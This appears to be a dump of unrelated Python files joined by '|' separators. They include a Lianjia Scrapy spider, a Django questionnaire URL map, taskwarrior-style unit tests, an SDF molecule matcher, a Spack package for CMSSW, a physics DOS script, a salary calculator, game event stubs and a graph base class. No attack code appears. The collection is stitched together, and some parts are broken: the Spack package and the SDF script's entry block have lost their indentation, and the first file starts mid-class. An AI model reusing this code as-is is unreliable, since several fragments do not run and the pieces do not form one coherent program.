    name = "a"

    def start_requests(self):
        # Single seed page; parse() handles the response.
        urls = [
            'https://sh.lianjia.com/ershoufang/pudong/'
        ]
        for url in urls:
            yield scrapy.Request(url=url, callback=self.parse)

    def parse(self, response):
        # NOTE(review): 'clear.title' selects <clear class="title"> elements,
        # which do not exist in HTML — a selector like '.clear .title' was
        # probably intended; confirm against the page markup.
        for a in response.css('clear.title'):
            yield {
                # BUG FIX: 'href::text' looks for the text of a nonexistent
                # <href> element; the link target is the href *attribute* of
                # the matched node.
                'href': a.css('::attr(href)').extract_first()
            }
from django.urls import path
from quest import views
# URL map for the questionnaire flow; the numeric path segments mirror the
# step order (registration -> studies -> experience -> languages -> survey),
# and the commented entries are reserved step numbers not yet implemented.
urlpatterns = [
    path('1',views.V1,name ='inizio'),
    path('2',views.ProvaView,name ='login_utenti' ),
    # path('3',),
    path('4',views.RegistrationView,name ='registrazione_utenti'),
    path('5',views.RegistrationAnagView,name ='registrazioni_anagrafica'),
    path('6',views.V6,name='ingresso_studi'),
    path('7',views.RegistrationStudView,name ='registrazioni_studi'),
    path('8',views.V8,name='uscita_studi'),
    path('9',views.V9, name ='ingresso_esperienza'),
    path('10',views.RegistrationExpView,name ='registrazioni_esperienze'),
    path('11',views.V11,name='uscita_esperienze'),
    path('12',views.V12,name='ingresso_lingue'),
    path('13',views.RegistrationLangView,name ='registrazioni_lingue'),
    path('14',views.V14,name='uscita_lingue'),
    path('15',views.QuestView,name ='registrazioni_questionari'),
    path('16',views.V16,name ='fine'),
    path('17',views.V17,name ='pagina_utente'),
    path('18',views.UpdatefirstStudView,name ='upload_primo_studi'),
    path('19',views.V19,name ='upload_studi'),
    path('20',views.UpdatesecondStudView,name ='upload_secondo_studi'),
    path('21',views.UpdateFirstExpView,name ='upload_primo_esperienze'),
    path('22',views.V22,name ='upload_esperienze'),
    path('23',views.UpdateSecondExpView,name ='upload_secondo_esperienze'),
    path('24',views.UpdateFirstLangView,name ='upload_primo_lingue'),
    path('25',views.V25,name ='upload_lingue'),
    path('26',views.UpdatesecondLangView,name ='upload_secondo_lingue'),
    path('27',views.UpdateAnagView,name ='upload_anagrafica'),
    # path('28',),
    # path('29',),
    # path('30',),
    # path('31',),
]
|
# For each input line of digit characters, repeatedly replace each digit with
# (itself + right neighbour) mod 10, shrinking the window from the left until
# one digit remains, and print that digit.  Reads lines until EOF.
while True:
    try:
        x = list(map(int, input()))
    except (EOFError, ValueError):
        # BUG FIX: narrowed from a bare `except:` — stop on end of input or a
        # malformed line instead of swallowing every exception (including
        # KeyboardInterrupt).  Also removed the trailing '|' join artifact.
        break
    # NOTE(review): the fixed ranges assume exactly 10 digits per line — confirm.
    for i in range(10, 1, -1):
        for n in range(1, i):
            x[n - 1] = (x[n - 1] + x[n]) % 10
    print(x[0])
import unittest
import copy
import json
from pprint import pprint
from manage_notes_annotation import load_task_data, manage_notes_annotation
# Fixture pairs for TestManageNotesAnnotation below.  Each *_BEFORE/*_AFTER
# pair represents the task payload before and after a modification event;
# "[Notes]" is the marker annotation that the hook keeps in sync with the
# "notes" attribute.
TASK_ADD_NO_NOTES = {
    "uuid": "test-uuid",
}
TASK_ADD_WITH_NOTES = {
    "uuid": "test-uuid",
    "notes": "test notes",
}
NOTE_ANNOTATION_NO_NOTES_BEFORE = {
    "annotations": [
        {
            "description": "[Notes]",
            "entry": "20190131T194834Z"
        },
    ],
    "uuid": "test-uuid",
}
NOTE_ANNOTATION_NO_NOTES_AFTER = {
    "annotations": [
        {
            "description": "[Notes]",
            "entry": "20190131T194834Z"
        },
    ],
    "uuid": "test-uuid",
    "notes": "",
}
MULTIPLE_ANNOTATIONS_NO_NOTES_BEFORE = {
    "annotations": [
        {
            "description": "[Notes]",
            "entry": "20190131T194834Z"
        },
        {
            "description": "test description",
            "entry": "20190131T194834Z"
        },
    ],
    "uuid": "test-uuid",
    "notes": "",
}
MULTIPLE_ANNOTATIONS_NO_NOTES_AFTER = {
    "annotations": [
        {
            "description": "[Notes]",
            "entry": "20190131T194834Z"
        },
        {
            "description": "test description",
            "entry": "20190131T194834Z"
        },
    ],
    "uuid": "test-uuid",
}
NOTE_ANNOTATION_WITH_NOTES_BEFORE = {
    "annotations": [
        {
            "description": "[Notes]",
            "entry": "20190131T194834Z"
        },
    ],
    "uuid": "test-uuid",
    "notes": "test notes",
}
NOTE_ANNOTATION_WITH_NOTES_AFTER = {
    "annotations": [
        {
            "description": "[Notes]",
            "entry": "20190131T194834Z"
        },
    ],
    "uuid": "test-uuid",
    "notes": "test notes",
}
NOTE_ANNOTATION_WITH_CHANGED_NOTES_BEFORE = {
    "annotations": [
        {
            "description": "[Notes]",
            "entry": "20190131T194834Z"
        },
    ],
    "uuid": "test-uuid",
    "notes": "test notes",
}
NOTE_ANNOTATION_WITH_CHANGED_NOTES_AFTER = {
    "annotations": [
        {
            "description": "[Notes]",
            "entry": "20190131T194834Z"
        },
    ],
    "uuid": "test-uuid",
    "notes": "test notes changed",
}
MISSING_ANNOTATIONS_WITH_NOTES_BEFORE = {
    "uuid": "test-uuid",
    "notes": "test notes",
}
MISSING_ANNOTATIONS_WITH_NOTES_AFTER = {
    "uuid": "test-uuid",
    "notes": "test notes",
}
NO_ANNOTATION_WITH_NOTES_BEFORE = {
    "annotations": [
        {
            "description": "test description",
            "entry": "20190131T194834Z"
        },
    ],
    "uuid": "test-uuid",
    "notes": "test notes",
}
NO_ANNOTATION_WITH_NOTES_AFTER = {
    "annotations": [
        {
            "description": "test description",
            "entry": "20190131T194834Z"
        },
    ],
    "uuid": "test-uuid",
    "notes": "test notes",
}
MULTIPLE_ANNOTATIONS_WITH_NOTES_BEFORE = {
    "annotations": [
        {
            "description": "[Notes]",
            "entry": "20190131T194834Z"
        },
        {
            "description": "test description",
            "entry": "20190131T194834Z"
        },
    ],
    "uuid": "test-uuid",
    "notes": "test notes",
}
MULTIPLE_ANNOTATIONS_WITH_NOTES_AFTER = {
    "annotations": [
        {
            "description": "[Notes]",
            "entry": "20190131T194834Z"
        },
        {
            "description": "test description",
            "entry": "20190131T194834Z"
        },
    ],
    "uuid": "test-uuid",
    "notes": "test notes",
}
def process_data(data_before, data_after):
    """Run the hook on deep copies so the module-level fixtures stay pristine."""
    before = copy.deepcopy(data_before)
    after = copy.deepcopy(data_after)
    return manage_notes_annotation(before, after)
class TestManageNotesAnnotation(unittest.TestCase):
    """Behavioural tests for load_task_data and manage_notes_annotation."""
    def test_load_task_data_add(self):
        # "add" events provide no before-payload; it must come back as {}.
        json_string = json.dumps(TASK_ADD_WITH_NOTES)
        task_before, task_after = load_task_data(json_string, "")
        self.assertEqual(task_before, {})
        self.assertEqual(task_after, TASK_ADD_WITH_NOTES)
    def test_load_task_data_modify(self):
        # "modify" events provide both payloads as JSON strings.
        json_string_before = json.dumps(NOTE_ANNOTATION_NO_NOTES_BEFORE)
        json_string_after = json.dumps(NOTE_ANNOTATION_NO_NOTES_AFTER)
        task_before, task_after = load_task_data(json_string_before, json_string_after)
        self.assertEqual(task_before, NOTE_ANNOTATION_NO_NOTES_BEFORE)
        self.assertEqual(task_after, NOTE_ANNOTATION_NO_NOTES_AFTER)
    def test_add_task_no_notes(self):
        # No notes attribute -> no [Notes] annotation gets created.
        data = process_data({}, TASK_ADD_NO_NOTES)
        self.assertNotIn("annotations", data)
    def test_add_task_with_notes(self):
        # A notes attribute on a new task creates the [Notes] annotation.
        data = process_data({}, TASK_ADD_WITH_NOTES)
        self.assertEqual(len(data["annotations"]), 1)
        self.assertEqual(data["annotations"][0]["description"], "[Notes]")
    def test_note_annotation_no_notes(self):
        # Emptying the notes removes the sole [Notes] annotation entirely.
        data = process_data(NOTE_ANNOTATION_NO_NOTES_BEFORE, NOTE_ANNOTATION_NO_NOTES_AFTER)
        self.assertNotIn("annotations", data)
    def test_multiple_annotations_no_notes(self):
        # Only the [Notes] annotation is dropped; others are preserved.
        data = process_data(MULTIPLE_ANNOTATIONS_NO_NOTES_BEFORE, MULTIPLE_ANNOTATIONS_NO_NOTES_AFTER)
        self.assertEqual(len(data["annotations"]), len(MULTIPLE_ANNOTATIONS_NO_NOTES_AFTER["annotations"]) - 1)
        self.assertEqual(data["annotations"][0]["description"], "test description")
    def test_note_annotation_with_notes(self):
        # Unchanged notes leave the annotations untouched.
        data = process_data(NOTE_ANNOTATION_WITH_NOTES_BEFORE, NOTE_ANNOTATION_WITH_NOTES_AFTER)
        self.assertEqual(len(data["annotations"]), len(NOTE_ANNOTATION_WITH_NOTES_AFTER["annotations"]))
        self.assertEqual(data["annotations"][0]["description"], "[Notes]")
    def test_note_annotation_with_changed_notes(self):
        # Changed notes refresh the [Notes] annotation's entry timestamp.
        data = process_data(NOTE_ANNOTATION_WITH_CHANGED_NOTES_BEFORE, NOTE_ANNOTATION_WITH_CHANGED_NOTES_AFTER)
        self.assertEqual(len(data["annotations"]), len(NOTE_ANNOTATION_WITH_CHANGED_NOTES_AFTER["annotations"]))
        self.assertEqual(data["annotations"][0]["description"], "[Notes]")
        self.assertNotEqual(data["annotations"][0]["entry"], NOTE_ANNOTATION_WITH_CHANGED_NOTES_AFTER["annotations"][0]["entry"])
    def test_missing_annotations_with_notes(self):
        # Notes without any annotations list creates the [Notes] annotation.
        data = process_data(MISSING_ANNOTATIONS_WITH_NOTES_BEFORE, MISSING_ANNOTATIONS_WITH_NOTES_AFTER)
        self.assertEqual(len(data["annotations"]), 1)
        self.assertEqual(data["annotations"][0]["description"], "[Notes]")
    def test_no_annotation_with_notes(self):
        # Notes with unrelated annotations appends a [Notes] annotation.
        data = process_data(NO_ANNOTATION_WITH_NOTES_BEFORE, NO_ANNOTATION_WITH_NOTES_AFTER)
        self.assertEqual(len(data["annotations"]), len(NO_ANNOTATION_WITH_NOTES_AFTER["annotations"]) + 1)
        self.assertEqual(data["annotations"][0]["description"], "test description")
        self.assertEqual(data["annotations"][1]["description"], "[Notes]")
    def test_multiple_annotations_with_notes(self):
        # Unchanged notes with mixed annotations: everything preserved in order.
        data = process_data(MULTIPLE_ANNOTATIONS_WITH_NOTES_BEFORE, MULTIPLE_ANNOTATIONS_WITH_NOTES_AFTER)
        self.assertEqual(len(data["annotations"]), len(MULTIPLE_ANNOTATIONS_WITH_NOTES_AFTER["annotations"]))
        self.assertEqual(data["annotations"][0]["description"], "[Notes]")
        self.assertEqual(data["annotations"][1]["description"], "test description")
if __name__ == '__main__':
    unittest.main()
|
import sys
import collections
# Usage hint when run without arguments (argv parsing below will then fail).
if len(sys.argv) == 1:
    print('Code example \n')
    print('... \n')
class Molecule:
    # NOTE(review): the constructor arguments are ignored on purpose-or-not —
    # each instance always gets fresh empty containers.  "Fixing" this to use
    # the arguments would make every Molecule share the module-level dict `b`
    # passed by the loaders, so the current behaviour is load-bearing.
    def __init__(self, structure1, filds1):
        self.structure1 = []
        self.filds1 = collections.OrderedDict()
# Command-line configuration.
filename2 = sys.argv[1] # small sdf
idnumber_small = sys.argv[2] # idnumber small sdf
filename1 = sys.argv[3] # big sdf
idnumber_big = sys.argv[4] # idnumber big sdf
range1 = sys.argv[5] # 0.1-0.05
range2 = sys.argv[6] # 1
# Output report named after the small (query) sdf.
write_name = str(filename2)[:-4] + '_out.txt'
writefile = open(write_name, "w")
# Module-level state shared by the functions below.
sdf_all_big = collections.OrderedDict()
sdf_all_small = collections.OrderedDict()
empty_list = []
final_list = []
input_list = []
def load_sdf_big():
    """Parse filename1 (the big SDF) into sdf_all_big: record-id -> Molecule.

    Assumed record layout: a structure block terminated by an 'M END' line,
    data fields introduced by '> <NAME>' header lines, records terminated by
    '$$$$'.  NOTE(review): real SDF files usually spell the terminator
    'M  END' (two spaces) — confirm against the input files.
    """
    print('\n' + '=' * 45)
    linex = ''
    openfile1 = open(filename1, "r")
    a = []
    b = collections.OrderedDict()
    # counter1: 1 while inside a record's data section; counter2: 1 while
    # collecting the values of the current field.
    counter1 = 0
    counter2 = 0
    my_id = 0
    filds = []
    fields_value = []
    field_value = []
    for line in openfile1:
        if counter1 == 0:
            if line[:-1] == 'M END':
                counter1 = 1
                counter2 = 0
                continue
        else:
            # A new field header closes the previous field's value list.
            if counter2 == 1 and line[0] == '>':
                fields_value.append(field_value)
                field_value = []
                counter2 = 0
            if line[:-1] == '$$$$':
                # End of record: build the Molecule and store it by ordinal id.
                my_id += 1
                fields_value.append(field_value)
                z11 = Molecule(a, b)
                xraniliwe4 = collections.OrderedDict()
                for i in range(len(filds)):
                    xraniliwe3 = {filds[i]: fields_value[i]}
                    xraniliwe4.update(xraniliwe3)
                z11.filds1.update(xraniliwe4)
                xraniliwe2 = {str(my_id): z11}
                sdf_all_big.update(xraniliwe2)
                filds = []
                field_value = []
                fields_value = []
                counter1 = 0
                continue
            # NOTE(review): line[:4] can only equal the 3-char '> <' when the
            # line is exactly '> <', so this branch is effectively dead and the
            # elif below does the real work — possibly '>  <' was intended.
            if line[:4] == '> <':
                counter2 = 1
                line = line[4:-1]
                for z in line:
                    if z != '>':
                        linex = linex + str(z)
                filds.append(linex)
                linex = ''
                continue
            elif line[:3] == '> <':
                counter2 = 1
                line = line[3:-1]
                for z in line:
                    if z != '>':
                        linex = linex + str(z)
                filds.append(linex)
                linex = ''
                continue
            else:
                # Non-blank lines are values of the current field.
                if line[:-1] == '':
                    pass
                else:
                    field_value.append(line[:-1])
    openfile1.close()
    print('big sdf loaded\n')
    print('number of big base molecules = ' + str(len(sdf_all_big)) + '\n')
def load_sdf_small():
    """Parse filename2 (the small/query SDF) into sdf_all_small.

    NOTE(review): this duplicates load_sdf_big line-for-line except for the
    file handle, target dict and log strings — a shared helper parameterised
    on (filename, target) would remove the duplication.
    """
    print('\n' + '=' * 45)
    linex = ''
    openfile2 = open(filename2, "r")
    a = []
    b = collections.OrderedDict()
    # counter1: 1 while inside a record's data section; counter2: 1 while
    # collecting the values of the current field.
    counter1 = 0
    counter2 = 0
    my_id = 0
    filds = []
    fields_value = []
    field_value = []
    for line in openfile2:
        if counter1 == 0:
            if line[:-1] == 'M END':
                counter1 = 1
                counter2 = 0
                continue
        else:
            # A new field header closes the previous field's value list.
            if counter2 == 1 and line[0] == '>':
                fields_value.append(field_value)
                field_value = []
                counter2 = 0
            if line[:-1] == '$$$$':
                # End of record: build the Molecule and store it by ordinal id.
                my_id += 1
                fields_value.append(field_value)
                z12 = Molecule(a, b)
                xraniliwe4 = collections.OrderedDict()
                for i in range(len(filds)):
                    xraniliwe3 = {filds[i]: fields_value[i]}
                    xraniliwe4.update(xraniliwe3)
                z12.filds1.update(xraniliwe4)
                xraniliwe2 = {str(my_id): z12}
                sdf_all_small.update(xraniliwe2)
                filds = []
                field_value = []
                fields_value = []
                counter1 = 0
                continue
            # NOTE(review): as in load_sdf_big, this first branch is
            # effectively dead (4-char slice vs 3-char literal).
            if line[:4] == '> <':
                counter2 = 1
                line = line[4:-1]
                for z in line:
                    if z != '>':
                        linex = linex + str(z)
                filds.append(linex)
                linex = ''
                continue
            elif line[:3] == '> <':
                counter2 = 1
                line = line[3:-1]
                for z in line:
                    if z != '>':
                        linex = linex + str(z)
                filds.append(linex)
                linex = ''
                continue
            else:
                # Non-blank lines are values of the current field.
                if line[:-1] == '':
                    pass
                else:
                    field_value.append(line[:-1])
    openfile2.close()
    print('small sdf loaded\n')
    print('number of qvery molecules = ' + str(len(sdf_all_small)) + '\n')
def input_list_fill():
    """Seed input_list with every query-molecule ID plus the IDs stored in 1.txt."""
    known_ids = open('1.txt', "r")
    # Each query molecule's own ID must be excluded from the search results.
    for key in sdf_all_small:
        input_list.append(sdf_all_small.get(key).filds1.get(idnumber_small)[0])
    print('input list filed\n')
    # Add previously recorded IDs, skipping duplicates.
    for line in known_ids:
        if line[:-1] not in input_list:
            input_list.append(line[:-1])
    known_ids.close()
    print(str(len(input_list)))
def find_by_pt():
    """For each query molecule, find the first big-base molecule whose eight
    physico-chemical properties all fall inside a tolerance window.

    Continuous properties (SlogP/TPSA/AMW/NumHeavyAtoms) use a relative
    window of +-range1; count properties (HBD/HBA/rings/rotatable bonds) use
    an absolute window of +-range2.  Matches are written to writefile and
    added to input_list so they cannot be matched twice.  Stops after 100
    matches in total.
    """
    counter1 = 0
    # status: 1 once the current query found a match (reset per query).
    status = 0
    er = 0
    total_found = 0
    for sdf in sdf_all_small:
        # Progress report every 300 processed queries.
        counter1 += 1
        if counter1 == 300:
            er += 300
            print('search total ' + str(er) + ' molecules\n')
            counter1 = 0
        # Pre-compute the acceptance window [*_d, *_a] for every property.
        a = float(sdf_all_small.get(sdf).filds1.get('SlogP')[0])
        SlogP_a = a + a * float(range1)
        SlogP_d = a - a * float(range1)
        b = float(sdf_all_small.get(sdf).filds1.get('TPSA')[0])
        TPSA_a = b + b * float(range1)
        TPSA_d = b - b * float(range1)
        c = float(sdf_all_small.get(sdf).filds1.get('AMW')[0])
        AMW_a = c + c * float(range1)
        AMW_d = c - c * float(range1)
        d = float(sdf_all_small.get(sdf).filds1.get('NumHeavyAtoms')[0])
        NumHeavyAtoms_a = d + d * float(range1)
        NumHeavyAtoms_d = d - d * float(range1)
        e = float(sdf_all_small.get(sdf).filds1.get('NumHBD')[0])
        NumHBD_a = e + float(range2)
        NumHBD_d = e - float(range2)
        f = float(sdf_all_small.get(sdf).filds1.get('NumHBA')[0])
        NumHBA_a = f + float(range2)
        NumHBA_d = f - float(range2)
        g = float(sdf_all_small.get(sdf).filds1.get('NumRings')[0])
        NumRings_a = g + float(range2)
        NumRings_d = g - float(range2)
        h = float(sdf_all_small.get(sdf).filds1.get('NumRotatableBonds')[0])
        NumRotatableBonds_a = h + float(range2)
        NumRotatableBonds_d = h - float(range2)
        # count_in = 0
        # Filter cascade: every candidate must pass all eight windows; any
        # failure (or a missing query property) skips to the next candidate.
        for sdf2 in sdf_all_big:
            # Skip candidates already claimed (or listed in 1.txt).
            if sdf_all_big.get(sdf2).filds1.get(idnumber_big)[0] in input_list:
                continue
            if sdf_all_small.get(sdf).filds1.get('SlogP') != empty_list:
                if SlogP_d <= float(sdf_all_big.get(sdf2).filds1.get('SlogP')[0]) <= SlogP_a:
                    pass
                else:
                    continue
            else:
                continue
            if sdf_all_small.get(sdf).filds1.get('TPSA') != empty_list:
                if TPSA_d <= float(sdf_all_big.get(sdf2).filds1.get('TPSA')[0]) <= TPSA_a:
                    pass
                else:
                    continue
            else:
                continue
            if sdf_all_small.get(sdf).filds1.get('AMW') != empty_list:
                if AMW_d <= float(sdf_all_big.get(sdf2).filds1.get('AMW')[0]) <= AMW_a:
                    pass
                else:
                    continue
            else:
                continue
            if sdf_all_small.get(sdf).filds1.get('NumHeavyAtoms') != empty_list:
                if NumHeavyAtoms_d <= float(sdf_all_big.get(sdf2).filds1.get('NumHeavyAtoms')[0]) <= NumHeavyAtoms_a:
                    pass
                else:
                    continue
            else:
                continue
            if sdf_all_small.get(sdf).filds1.get('NumHBD') != empty_list:
                if NumHBD_d <= float(sdf_all_big.get(sdf2).filds1.get('NumHBD')[0]) <= NumHBD_a:
                    pass
                else:
                    continue
            else:
                continue
            if sdf_all_small.get(sdf).filds1.get('NumHBA') != empty_list:
                if NumHBA_d <= float(sdf_all_big.get(sdf2).filds1.get('NumHBA')[0]) <= NumHBA_a:
                    pass
                else:
                    continue
            else:
                continue
            if sdf_all_small.get(sdf).filds1.get('NumRings') != empty_list:
                if NumRings_d <= float(sdf_all_big.get(sdf2).filds1.get('NumRings')[0]) <= NumRings_a:
                    pass
                else:
                    continue
            else:
                continue
            if sdf_all_small.get(sdf).filds1.get('NumRotatableBonds') != empty_list:
                if NumRotatableBonds_d <= float(sdf_all_big.get(sdf2).filds1.get('NumRotatableBonds')[0]) <= NumRotatableBonds_a:
                    pass
                else:
                    continue
            else:
                continue
            # All eight checks passed: record the pairing and claim the
            # candidate so later queries cannot reuse it.
            final_list.append(sdf_all_big.get(sdf2).filds1.get(idnumber_big)[0])
            status = 1
            input_list.append(sdf_all_big.get(sdf2).filds1.get(idnumber_big)[0])
            writefile.write(str(sdf_all_small.get(sdf).filds1.get(idnumber_small)[0]) + '\t')
            writefile.write(str(sdf_all_big.get(sdf2).filds1.get(idnumber_big)[0]) + '\n')
            print(str(sdf_all_big.get(sdf2).filds1.get(idnumber_big)[0]) + '\n')
            # count_in += 1
            # if count_in == 3:
            # Only the first match per query is kept.
            break
        if status == 0:
            writefile.write(str(sdf_all_small.get(sdf).filds1.get(idnumber_small)[0]) + '\t')
            writefile.write('no found\n')
            print(str('no found\n'))
        else:
            status = 0
            total_found += 1
            if total_found > 100:
                break
    print(str(len(final_list)))
    writefile.close()
if __name__ == "__main__":
load_sdf_big()
load_sdf_small()
input_list_fill()
find_by_pt()
|
from spack import *
from glob import glob
from string import Template
import re
import fnmatch
import shutil
from spack.util.executable import Executable
import sys,os
sys.path.append(os.path.join(os.path.dirname(__file__), '../../common'))
from scrampackage import relrelink
class CmsswScram(Package):
"""CMSSW built as a scram project"""
homepage = "http://cms-sw.github.io"
url = "https://github.com/cms-sw/cmssw/archive/CMSSW_10_2_0.tar.gz"
version('10.3.0.pre3', git='https://github.com/cms-sw/cmssw.git', tag='CMSSW_10_3_0_pre3')
depends_on('scram')
depends_on('cmssw-config')
depends_on('cmssw-tool-conf')
depends_on('gmake')
depends_on('llvm')
if sys.platform == 'darwin':
patch('macos.patch')
else:
patch('linux.patch')
scram_arch = 'slc_amd64_gcc'
if sys.platform == 'darwin':
scram_arch = 'osx10_amd64_clang'
def install(self, spec, prefix):
scram = Executable(spec['scram'].prefix.bin+'/scram')
source_directory = self.stage.source_path
cmssw_version = 'CMSSW.' + str(self.version)
cmssw_u_version = cmssw_version.replace('.', '_')
scram_version = 'V%s' % spec['scram'].version
config_tag = '%s' % spec['cmssw-config'].version
gcc = which(spack_f77)
gcc_prefix = re.sub('/bin/.*$', '', self.compiler.f77)
gcc_machine = gcc('-dumpmachine', output=str)
gcc_ver = gcc('-dumpversion', output=str)
with working_dir(self.stage.path):
install_tree(source_directory, 'src')
install_tree(spec['cmssw-config'].prefix.bin, 'config')
with open('config/config_tag', 'w') as f:
f.write(config_tag+'\n')
f.close()
uc = Executable('config/updateConfig.pl')
uc('-p', 'CMSSW',
'-v', '%s' % cmssw_u_version,
'-s', '%s' % scram_version,
'-t', '%s' % spec['cmssw-tool-conf'].prefix,
'--keys', 'SCRAM_COMPILER=gcc',
'--keys', 'PROJECT_GIT_HASH=' + cmssw_u_version,
'--arch', '%s' % self.scram_arch)
scram('project', '-d', os.path.realpath(self.stage.path), '-b', 'config/bootsrc.xml')
project_dir =join_path(os.path.realpath(self.stage.path),cmssw_u_version)
with working_dir(project_dir, create=False):
matches = []
for f in glob('src/*/*/test/BuildFile*'):
matches.append(f)
for m in matches:
if os.path.exists(m):
os.remove(m)
# scram.add_default_env('LOCALTOP', project_dir)
# scram.add_default_env('CMSSW_BASE', project_dir)
scram.add_default_env(
'LD_LIBRARY_PATH', project_dir + '/lib/' + self.scram_arch)
scram.add_default_env(
'LD_LIBRARY_PATH', self.spec['llvm'].prefix.lib)
scram.add_default_env(
'LD_LIBRARY_PATH', self.spec['llvm'].prefix.lib64)
scram('setup', 'self')
scram('build', '-v', '-j8')
shutil.rmtree('tmp')
install_tree(project_dir,prefix+'/'+cmssw_u_version, symlinks=True)
relrelink(prefix+'/'+cmssw_u_version+'external')
with working_dir(join_path(prefix,cmssw_u_version), create=False):
# os.environ[ 'LOCALTOP' ] = os.getcwd()
# os.environ[ 'RELEASETOP' ] = os.getcwd()
# os.environ[ 'CMSSW_RELEASE_BASE' ] = os.getcwd()
# os.environ[ 'CMSSW_BASE' ] = os.getcwd()
scram('build', 'ProjectRename')
def setup_dependent_environment(self, spack_env, run_env, dspec):
    """Expose this CMSSW release's libraries to dependent packages.

    Appends the release's scram-arch lib directory and LLVM's lib64 to
    LD_LIBRARY_PATH in the dependent's build environment.
    """
    # CMSSW_X_Y_Z directory name: spack version with dots turned into underscores.
    release_dir = ('CMSSW.' + str(self.version)).replace('.', '_')
    release_lib = self.prefix + '/' + release_dir + '/lib/' + self.scram_arch
    spack_env.append_path('LD_LIBRARY_PATH', release_lib)
    spack_env.append_path('LD_LIBRARY_PATH', self.spec['llvm'].prefix.lib64)
def setup_environment(self, spack_env, run_env):
    """Set up LD_LIBRARY_PATH for this package's own build.

    Points at the in-stage CMSSW project lib directory plus LLVM's lib and
    lib64 directories.
    """
    release_dir = ('CMSSW.' + str(self.version)).replace('.', '_')
    # Build happens inside the stage, not the final prefix.
    project_dir = join_path(os.path.realpath(self.stage.path), release_dir)
    llvm_prefix = self.spec['llvm'].prefix
    spack_env.append_path('LD_LIBRARY_PATH', project_dir + '/lib/' + self.scram_arch)
    spack_env.append_path('LD_LIBRARY_PATH', llvm_prefix.lib)
    spack_env.append_path('LD_LIBRARY_PATH', llvm_prefix.lib64)
|
import numpy as np
import json
import os
from mea import auxfn
from mea.model.io_triangle import IOTriangle as green
from mea.model.triangle import Triangle as Model
from mea.transport import sigmadc
from scipy.integrate import simps
cwd = os.getcwd()
# Load fit parameters (chemical potential mu and inverse temperature beta)
# produced by an earlier statistics run.
with open("statsparams0.json") as fin:
    params = json.load(fin)
mu = params["mu"][0]
beta = params["beta"][0]
# Build the auxiliary Green's function from the averaged self-energy and
# analytically continue it using the OME default/input configuration files.
gf_aux = auxfn.GFAux(fin_sE_to=os.path.join(cwd, "self_moy.dat"), mu=mu, delta=0.001)
gf_aux.ac(fin_OME_default=os.path.join(cwd, "OME_default.dat"), fin_OME_input=os.path.join(cwd, "OME_input.dat"))
gf_aux.get_sEvec_w_list()
# Convert self-energies from the irreducible representation to cluster form.
sEvec_cw_list = list(map(green().ir_to_c, gf_aux.sEvec_irw_list))
w_vec_list = gf_aux.w_vec_list
# For each frequency grid / self-energy pair: write DOS files, then reload
# them to print normalisation checks and compute the DC conductivity.
for (i, (sEvec_cw, w_vec)) in enumerate(zip(sEvec_cw_list, w_vec_list)):
    model = Model(1.0, 0.4, mu, w_vec, sEvec_cw)
    fout_name = "dos" + str(i) + ".dat"
    fout_name_dos_trace = "dos_trace" + str(i) + ".txt"
    dos = model.calc_dos(fout_name)
    dos_trace = model.calc_dos_with_trace(fout_name_dos_trace)
    # NOTE(review): `dos` and the first `dos_trace` results are immediately
    # shadowed by the np.loadtxt reloads below — confirm the in-memory
    # return values are not needed.
    dos_fct = np.loadtxt(fout_name)
    dos_trace = np.loadtxt(fout_name_dos_trace)
    # Integrate the written spectra (trapezoid/Simpson) as a sanity check.
    print("dos normalisation = ", simps(dos_fct[:, 1], dos_fct[:, 0])/(2.0*np.pi))
    print("dos_trace normalisation = ", simps(dos_trace[:, 1], dos_trace[:, 0])/(2.0*np.pi))
    print("zkweight = ", model.zk_weight(np.pi, np.pi) )
    #fout_fermi = "fermi_surface" + str(i) + ".dat"
    #fermi_surface(model, w_value=0.0, fout=fout_fermi)
    sdc = sigmadc.SigmaDC(model, beta=beta)
    sdc.calc_sigmadc()
# Salary adjustment by band: <=400 -> 15%, <=800 -> 12%, <=1200 -> 10%,
# <=2000 -> 7%, above -> 4%. Prints new salary, raise amount and percentage.
s = float(input())
# The elif chain already guarantees each band's lower bound, so the original
# redundant re-checks (e.g. `400 < s <= 800`) were dropped; the duplicated
# `r = rate * s; s += r` was hoisted out of every branch.
if s <= 400:
    p = '15 %'
    rate = 0.15
elif s <= 800:
    p = '12 %'
    rate = 0.12
elif s <= 1200:
    p = '10 %'
    rate = 0.10
elif s <= 2000:
    p = '7 %'
    rate = 0.07
else:
    p = '4 %'
    rate = 0.04
r = rate * s  # raise amount
s += r
print('Novo salario: {:.2f}\nReajuste ganho: {:.2f}\nEm percentual: {}'.format(s, r, p))
def workerStrike():
    """Announce the worker-strike event (half of the player's resources are lost)."""
    # Fixed user-facing grammar: "have been stealing" -> "have been stolen".
    print("Workers are striking and half your resources have been stolen")
def factoryFire():
    """Announce the factory-fire event."""
    message = "Your factory is on fire"
    print(message)
def worldWar():
    """Announce the world-war event."""
    message = "The world falls into total war"
    print(message)
def theGreatDepression():
    """Announce the Great Depression event."""
    message = "The great Depression"
    print(message)
def theSnap():
    """Announce the snap event (halves the player's resources)."""
    message = "Snaps half of your resources away"
    print(message)
def elonInvests():
    """Announce the Elon-invests event (free upgrade on one building)."""
    # Fixed user-facing typo: "buidling" -> "building".
    print("Elon Musk invests in your operation, upgrade on building of your choosing")
|
import subprocess
# Launch the WhatsApp desktop client for Windows user "ikira".
# NOTE(review): Popen returns immediately and the handle in `file` is never
# waited on; the hard-coded user-specific path will fail on other machines —
# confirm this is a single-user convenience script.
file = subprocess.Popen("C:\\Users\\ikira\\AppData\\Local\\WhatsApp\\WhatsApp.exe")
import os
from abc import ABC, abstractmethod
import numpy as np
from scipy import sparse as sp
from scipy.sparse.linalg.eigen.arpack import eigsh
from app.utils.constant import GCN, NETWORK, LABEL, FEATURE,SYMMETRIC, GCN_POLY
from app.utils.util import invert_dict, map_set_to_khot_vector, map_list_to_floats
class Base_Graph(ABC):
    '''Base class for the graph data structure.

    Holds the adjacency matrix, node features, labels and the string<->id
    mappings needed to interpret them. Subclasses implement `read_network`
    for their concrete edge-list format.
    '''
    def __init__(self, model_name=GCN, sparse_features=True):
        '''Method to initialise the graph'''
        self.preprocessed = False
        self.features = None
        # nodes X features
        self.adj = None
        self.labels = None
        # nodes X labels
        # For optimisation
        self.sparse_features = sparse_features
        # We are saving the model_name as different models would need different kind of preprocessing.
        self.model_name = model_name
        # We are saving the mappings so that we do not have to make any assumptions about the data types any more.
        # `label` and `node` are assumed to be strings as read from the input file.
        self.label_to_id_map = {}
        self.id_to_label_map = {}
        self.node_to_id_map = {}
        self.id_to_node_map = {}
        # Mapping of node to labels and lables to nodes. We would use the latter for computing scores.
